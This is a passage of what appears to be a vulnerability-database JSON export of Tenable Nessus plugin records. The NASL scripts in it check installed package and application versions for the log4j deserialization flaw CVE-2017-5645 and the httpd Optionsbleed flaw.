\"CVE-2017-5645\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : log4j (EulerOS-SA-2017-1214)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the log4j package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - It was found that when using remote logging with log4j\n socket server the log4j server would deserialize any\n log event received via TCP or UDP. An attacker could\n use this flaw to send a specially crafted log event\n that, during deserialization, would execute arbitrary\n code in the context of the logger application.\n (CVE-2017-5645)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1214\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8fd10d04\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"log4j-1.2.17-16\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:50", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "Fedora 24 : log4j12 (2017-7e0ff7f73a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j12", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-7E0FF7F73A.NASL", "href": "https://www.tenable.com/plugins/nessus/100745", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-7e0ff7f73a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100745);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-7e0ff7f73a\");\n\n script_name(english:\"Fedora 24 : log4j12 (2017-7e0ff7f73a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-7e0ff7f73a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected log4j12 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"log4j12-1.2.17-19.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j12\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:56", "description": "According to the version of the log4j package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application.\n (CVE-2017-5645)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-11T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : log4j (EulerOS-SA-2017-1213)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:log4j", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1213.NASL", "href": "https://www.tenable.com/plugins/nessus/103071", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103071);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-5645\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : log4j (EulerOS-SA-2017-1213)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the log4j package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - It was found that when using remote logging with log4j\n socket server the log4j server would deserialize any\n log event received via TCP or UDP. An attacker could\n use this flaw to send a specially crafted log event\n that, during deserialization, would execute arbitrary\n code in the context of the logger application.\n (CVE-2017-5645)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1213\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00a5e5b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"log4j-1.2.17-16\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:55:39", "description": "According to its self-reported version number, the Oracle GoldenGate for Big Data application located on the remote host 12.3.2.1.x less than 12.3.2.1.2. It is, therefore, affected by a remote code execution vulnerability due to insecure deserialization of log events received by the Apache Log4j subcomponent's TCP or UDP socket server. An unauthenticated, remote attacker can exploit this to execute arbitrary code by sending a specially crafted, serialized binary payload.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-01-28T00:00:00", "type": "nessus", "title": "Oracle GoldenGate for Big Data 12.3.2.1.x < 12.3.2.1.2 Apache Log4j Insecure Deserialization RCE (Jan 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:goldengate_application_adapters"], "id": "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_JAN_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/133268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133268);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_bugtraq_id(97702);\n\n script_name(english:\"Oracle GoldenGate for Big Data 12.3.2.1.x < 12.3.2.1.2 Apache Log4j Insecure Deserialization RCE (Jan 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Oracle GoldenGate for Big Data application on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Oracle GoldenGate for Big Data application located on the remote\nhost 12.3.2.1.x less than 12.3.2.1.2. It is, therefore, affected by a remote code execution vulnerability due to\ninsecure deserialization of log events received by the Apache Log4j subcomponent's TCP or UDP socket server. An\nunauthenticated, remote attacker can exploit this to execute arbitrary code by sending a specially crafted, serialized\nbinary payload.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14755ac7\");\n # https://docs.oracle.com/en/middleware/goldengate/big-data/12.3.2.1/gbdrn/corrected-problems.html#GUID-4286C791-466E-42A2-92A6-2DF777A4A18E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7481d30\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle GoldenGate for Big Data version 12.3.2.1.2 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5645\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:goldengate_application_adapters\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_goldengate_for_big_data_installed.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/Oracle GoldenGate for Big Data\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('vcf.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = 'Oracle GoldenGate for Big Data';\napp_info = vcf::get_app_info(app:app_name);\n\n// January CPU says 12.3.2.1.1 is the affected version. There's conflicting information, but as this is a paranoid only\n// check we'll flag for 12.3.2.1.x < 12.3.2.1.2.\nconstraints = [\n { 'min_version':'12.3.2.1', 'fixed_version':'12.3.2.1.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:56", "description": "This is a release fixing a security fix applied upstream, known as 'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why wouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-25T00:00:00", "type": "nessus", "title": "Fedora 26 : httpd (2017-a52f252521) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-A52F252521.NASL", "href": "https://www.tenable.com/plugins/nessus/103438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a52f252521.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103438);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"FEDORA\", value:\"2017-a52f252521\");\n\n script_name(english:\"Fedora 26 : httpd (2017-a52f252521) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a release fixing a security fix applied upstream, known as\n'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why\nwouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a52f252521\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"httpd-2.4.27-3.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:18", "description": "This is a release fixing a security fix applied upstream, known as 'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why wouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-01-15T00:00:00", "type": "nessus", "title": "Fedora 27 : httpd (2017-fdd3a98e8f) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-FDD3A98E8F.NASL", "href": "https://www.tenable.com/plugins/nessus/106018", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-fdd3a98e8f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106018);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"FEDORA\", value:\"2017-fdd3a98e8f\");\n\n script_name(english:\"Fedora 27 : httpd (2017-fdd3a98e8f) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a release fixing a security fix applied upstream, known as\n'optionsbleed' in popular parlance.\n\nIt is relevant for hosted and co-located instances of Fedora (and why\nwouldn't you?).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-fdd3a98e8f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif 